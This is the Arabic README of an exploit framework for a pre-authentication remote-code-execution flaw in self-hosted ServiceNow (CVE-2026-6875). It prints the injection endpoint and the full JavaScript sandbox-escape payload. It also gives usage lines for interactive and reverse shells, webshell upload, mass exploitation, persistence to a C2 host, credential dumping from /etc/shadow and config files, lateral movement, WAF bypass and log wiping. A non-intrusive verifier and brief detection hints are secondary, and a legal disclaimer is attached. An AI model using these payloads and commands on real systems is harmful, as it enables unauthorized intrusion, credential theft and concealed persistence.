
CVE-2026-6875 إطار عمل RCE قبل المصادقة لـ ServiceNow 🔥 حقن JS → الهروب من الحماية → RCE → الجذر. الميزات: --detect، --exec، shell عكسي/تفاعلي، التنفيذ المتعدد الدفعي، تجاوز WAF، الاستمرارية، الحركة الجانبية، تفريغ بيانات الاعتماد، تنفيذ بدون ملفات، مسح الآثار. 🛡️ تم استغلاله بنشاط، درجة CVSS 9.5. للاستخدام المصرح به والقانوني فقط. حافظ على القانونية. 🔒

إطار عمل الاستغلال والمتحقق الآمن
لأغراض الاختبار الأمني المصرح به فقط.
تم توفير هذه الأداة لأغراض تعليمية واختبار الاختراق المصرح به فقط.
المؤلفون والمساهمون ليسوا مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذا البرنامج. يتحمل المستخدمون وحدهم مسؤولية ضمان حصولهم على إذن كتابي صريح من مالك الهدف قبل الاختبار. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب قانون الاحتيال وإساءة استخدام الكمبيوتر (CFAA) والقوانين المماثلة في جميع أنحاء العالم.
باستخدام هذه الأداة، فإنك توافق على:
⚠️ تحذير: يتم استغلال هذه الثغرة بنشاط على أرض الواقع. قد يؤدي الاستخدام غير المصرح به إلى عواقب قانونية شديدة.
CVE-2026-6875 هي ثغرة حرجة لتنفيذ الأوامر عن بعد (RCE) بدون مصادقة في منصة ServiceNow AI (المعروفة سابقًا باسم Now Platform). تسمح للمهاجمين بتجاوز الصندوق الرملي للبرامج النصية وتنفيذ أوامر النظام التعسفية بامتيازات تطبيق ServiceNow.
حقن جافا سكريبت: يقبل نقطة النهاية assessment_thanks.do معامل sysparm_assessable_type. بإضافة البادئة javascript: إلى القيمة، يقوم المهاجم بحقن كود جافا سكريبت عشوائي.
هروب من الصندوق الرملي: أداة متطورة للهروب من الصندوق الرملي (تربط بين DiscoveryFunctions.getCacheObjectForTable و AbstractAjaxProcessor و Class.create) ترفع قيود الصندوق الرملي لجافا سكريبت.
تنفيذ الأوامر عن بعد: يعمل كود جافا المحقون (عبر java.lang.Runtime.exec()) بامتيازات تطبيق ServiceNow، مما يتيح اختراق النظام بالكامل.
رفع الصلاحيات: تحاول وحدات ما بعد الاستغلال رفع الصلاحيات إلى الجذر عبر أخطاء تكوين sudo، أو ملفات SUID الثنائية، أو مهام cron القابلة للكتابة، أو استغلال النواة.
exploit.py)يقوم الاستغلال الكامل المسلح بربط حقن جافا سكريبت والهروب من الصندوق الرملي لتحقيق تنفيذ الأوامر عن بعد، مع وحدات متقدمة لما بعد الاستغلال للاستمرار والحركة الجانبية وتفريغ بيانات الاعتماد.
verifier.py)يقوم المتحقق الآمن بالكشف غير الاختراقي عن الثغرات دون تنفيذ حمولات ضارة أو إجراء تغييرات على النظام.
pip (لمكتبة requests)pip install requests urllib3
[!NOTE]
exploit.pyيستخدم فقط المكتبة القياسية للوظائف الأساسية؛requestsمطلوبة فقط لميزة--detect، وإشعارات--webhook، والمتحقق الآمن.
verifier.py)# Single target verification
python verifier.py -u 192.168.1.100
# Custom port and path
python verifier.py -u 10.0.0.5 -p 8443 --path /snow
# Mass scan from file
python verifier.py -l targets.txt -o results.json
# Quiet mode (only vulnerable targets)
python verifier.py -u 192.168.1.100 -q
# Increase timeout for slow targets
python verifier.py -u servicenow.example.com --timeout 60
# Custom User-Agent
python verifier.py -u 192.168.1.100 --user-agent "MyScanner/1.0"
# Interactive shell on target
python exploit.py -u 192.168.1.100
# Execute a single command
python exploit.py -u 192.168.1.100 --exec "id && whoami"
# Read a file
python exploit.py -u 192.168.1.100 --read-file /etc/passwd
# Enable detection before exploitation
python exploit.py -u 192.168.1.100 --detect
# Attempt root privilege escalation
python exploit.py -u 192.168.1.100 --privesc
# Upload a webshell
python exploit.py -u 192.168.1.100 --upload shell.jsp
# Install persistence with C2
python exploit.py -u 192.168.1.100 --persistence --c2-host 10.0.0.5 --c2-port 4444
# Clean tracks after exploit
python exploit.py -u 192.168.1.100 --clean
# Use fileless (memory) payload
python exploit.py -u 192.168.1.100 --fileless --c2-host 10.0.0.5 --c2-port 4444
# Mass exploit from file (50 threads)
python exploit.py -l targets.txt -m 50 --exec "uname -a"
# Custom callback server port
python exploit.py -u 192.168.1.100 --callback-port 9090
# Enable WAF bypass techniques
python exploit.py -u 192.168.1.100 --waf-bypass
# Send notifications via webhook
python exploit.py -u 192.168.1.100 --webhook https://myhook.com/snow
# Pipe mode (read command from stdin)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100
# Custom port and path
python exploit.py -u 10.0.0.5 -p 8443 --path /snow
# Disable TLS verification (for self-signed certs)
python exploit.py -u 192.168.1.100 --insecure-tls
# Custom timeout and retries
python exploit.py -u 192.168.1.100 -t 60 -r 5 -d 2.0
⚠️ هام: يتم تصحيح مثيلات ServiceNow السحابية تلقائيًا. تؤثر هذه الثغرة بشكل أساسي على النشر المستضاف ذاتيًا.
توجد الثغرة في نقطة النهاية assessment_thanks.do، والتي تقبل معامل sysparm_assessable_type. من خلال توفير قيمة تبدأ بـ javascript:، تقوم المنصة بتقييم كود جافا سكريبت اللاحق ضمن سياق النظام.
نقطة النهاية الضعيفة:
POST /assessment_thanks.do
sysparm_assessable_type=javascript:gs.print('test')
يكون الكود المحقون محصورًا في البداية داخل صندوق رملي. ومع ذلك، من خلال استغلال السلسلة التالية:
javascript:
var s="<payload>";
DiscoveryFunctions.getCacheObjectForTable=Object;
var a={};a.get=Object;
var b=new AbstractAjaxProcessor();
b.initialize=DiscoveryFunctions.getFirstValueFromTable(
a,"",DiscoveryFunctions.getFirstValueFromTable(
a,"",DiscoveryFunctions.getFirstValueFromTable(
a,"",global,"WorkflowIconsSCR",""),"prototype",""),"initialize","");
b.a=Class.create();b.a(s);
يتم تجاوز الصندوق الرملي، مما يمنح وصولاً كاملاً إلى فئات جافا مثل java.lang.Runtime.
يبحث عن ملفات .properties و .xml و .conf عن كلمات مرور ومفاتيح API وأسرار:
/opt/ServiceNow/conf/*.xml/var/log/ServiceNow/*.log/etc/passwd, /etc/shadowيُثبت أبوابًا خلفية عبر:
*/5 * * * *)، خدمات systemd، مفاتيح SSHschtasks)، مفاتيح تشغيل في السجليفحص الشبكة الفرعية المحلية للبحث عن مثيلات أخرى لـ ServiceNow أو مضيفات SSH، ويعيد استخدام بيانات الاعتماد المكتشفة.
يقوم بتجميع فئة جافا أثناء التشغيل، وتحميلها عبر ClassLoader، وتنفيذها في الذاكرة (بدون كتابة على القرص).
{/*comment*/})\u0077 لـ w)ne\u0077 لـ new)ابحث في سجلات ServiceNow عن:
extraweb_access.log – طلبات إلى /assessment_thanks.do مع sysparm_assessable_type تحتوي على:
javascript:DiscoveryFunctions.getCacheObjectForTableAbstractAjaxProcessor/var/tmp/ (مثل shell.jsp، نصوص .sh)/etc/passwd، /etc/shadow، أو ~/.ssh/authorized_keyscrontab -l)/etc/systemd/system/)/bin/bash -i، nc، curl، wget، python -c)[+] CVE-2026-15409/15410 - إطار عمل استغلال متعدد لـ SonicWall SMA1000
https://github.com/tc4dy/CVE-2026-15409-15410-Framework
[+] CVE-2026-41091 - SolarFlare (RedSun) رفع صلاحيات Microsoft Defender
https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
[+] CVE-2026-57821 - مجموعة أدوات حقن SQL لـ Apache Fineract
https://github.com/tc4dy/CVE-2026-57821-PoC-Exploit
[+] CVE-2026-41940 - تجاوز المصادقة في cPanel/WHM
https://github.com/tc4dy/CVE-2026-41940-PoC-Exploit
| السمة | القيمة |
|---|
| 📅 اكتُشفت | 1 أبريل 2026 (Searchlight Cyber) |
| ⚠️ درجة CVSS | 9.5 (حرجة) |
| 📋 CISA KEV | أُضيفت 13 يوليو 2026 |
| 🎯 المنتجات المتأثرة | منصة ServiceNow AI المستضافة ذاتيًا |
| 🔄 الإصدارات المُصلَحة | Brazil EA/GA, Australia Patch 2, Zurich Patch 7b/9, Yokohama Patch 12 Hot Fix 1b/13 |
| 🔓 المصادقة | غير مطلوب (بدون مصادقة) |
| 🌍 الاستغلال النشط | مؤكد استغلاله فعليًا (يوليو 2026) |
| الميزة | الوصف |
|---|
| 🚀 حقن جافا سكريبت | يحقن الحمولة عبر معامل sysparm_assessable_type. |
| 💻 هروب من الصندوق الرملي | يتجاوز الصندوق الرملي للبرامج النصية في ServiceNow لتشغيل كود جافا عشوائي. |
| 🔐 قشرة تفاعلية | توليد قشرة مباشرة مع دعم أوامر متعددة. |
| 👑 رفع الصلاحيات إلى الجذر | يتحقق من أخطاء تكوين sudo، وملفات SUID الثنائية، ومهام cron. |
| 📁 عمليات الملفات | رفع ويب شيل، قراءة/تنزيل الملفات عبر ترميز base64. |
| 🌐 فحص جماعي | استغلال جماعي لأهداف متعددة مع خيوط (-l). |
| 🎯 كشف آمن | علامة اختيارية --detect للتحقق غير الاختراقي من الثغرة. |
| ⚙️ تجاوز WAF | تقنيات تشويش مدمجة لتجاوز WAF/IDS (6 تقنيات). |
| 🧩 استمرار | تثبيت أبواب خلفية عبر cron/systemd/schtasks. |
| 🔍 حركة جانبية | فحص الشبكة المحلية لأجهزة أخرى ضعيفة ومحاولة الانتشار عبر SSH/SSRF. |
| 🧹 تنظيف الآثار | إزالة السجلات، وسجل bash، ومسارات التدقيق. |
| 💾 تنفيذ بدون ملفات | استخدام ClassLoader في جافا لتشغيل حمولات مقيمة في الذاكرة دون كتابة على القرص. |
| 🔌 خادم رد الاتصال | خادم HTTP مدمج لاستقبال مخرجات الأوامر (اختياري). |
| 📢 إشعارات ويب هوك | إرسال النتائج إلى رابط مخصص (Slack, Discord, إلخ). |
| 🪟 متعدد المنصات | يدعم أهداف Linux و Windows (cmd.exe / PowerShell). |
| 🔒 آمن للخيوط | يستخدم آليات قفل للعمليات المتزامنة. |
| 📊 كشف الإصدار | يكشف إصدار ServiceNow (Zurich/Brazil/Australia/Yokohama). |
| الأمر | الوصف |
|---|
exec <cmd> | تنفيذ أمر نظام |
upload <local> [remote] | رفع ويب شيل إلى الهدف |
download <remote> | تنزيل وعرض محتوى ملف |
privesc | محاولة رفع الصلاحيات |
reverse <host> <port> | إرسال قشرة عكسية |
dumpcred | تفريغ بيانات الاعتماد من إعدادات ServiceNow |
persist <host> <port> | تثبيت استمرار (cron/systemd/schtasks) |
lateral | محاولة حركة جانبية |
clean | تنظيف الآثار (السجلات، التاريخ) |
memory <host> <port> | تنفيذ حمولة جافا بدون ملفات |
exit | الخروج من القشرة التفاعلية |
| الميزة | الوصف |
|---|
| 🔍 كشف ServiceNow | يكشف مثيلات ServiceNow عبر نقاط نهاية متعددة. |
| 📊 كشف الإصدار | يكشف إصدارات ServiceNow المحددة ومستويات التصحيح. |
| 🧪 اختبار حقن جافا سكريبت | يختبر ثغرة الحقن باستخدام حمولات آمنة gs.print(). |
| 🔒 اختبار هروب الصندوق الرملي | يتحقق من هروب الصندوق الرملي دون أوامر تخريبية. |
| 📈 تسجيل الثقة | يوفر نسبة ثقة (85‑95%) بناءً على الأدلة. |
| 📋 إخراج JSON | تصدير النتائج بتنسيق JSON للتقارير. |
| 🔄 فحص جماعي | فحص أهداف متعددة مع دعم الخيوط. |
| 🎯 غير اختراقي | ينفذ فقط أمر uname -a غير ضار لمعلومات النظام. |
| إصدار ServiceNow | الإصدارات الضعيفة | الإصدارات المُصلَحة |
|---|
| Brazil | EA, GA | Patched (post‑GA) |
| Australia | Before Patch 2 | Patch 2+ |
| Zurich | Before Patch 7b, Patch 9 | Patch 7b, Patch 9+ |
| Yokohama | Before Patch 12 Hot Fix 1b | Patch 12 Hot Fix 1b, Patch 13 |
| إصدارات أخرى | غير معروف | راجع الإرشاد الرسمي |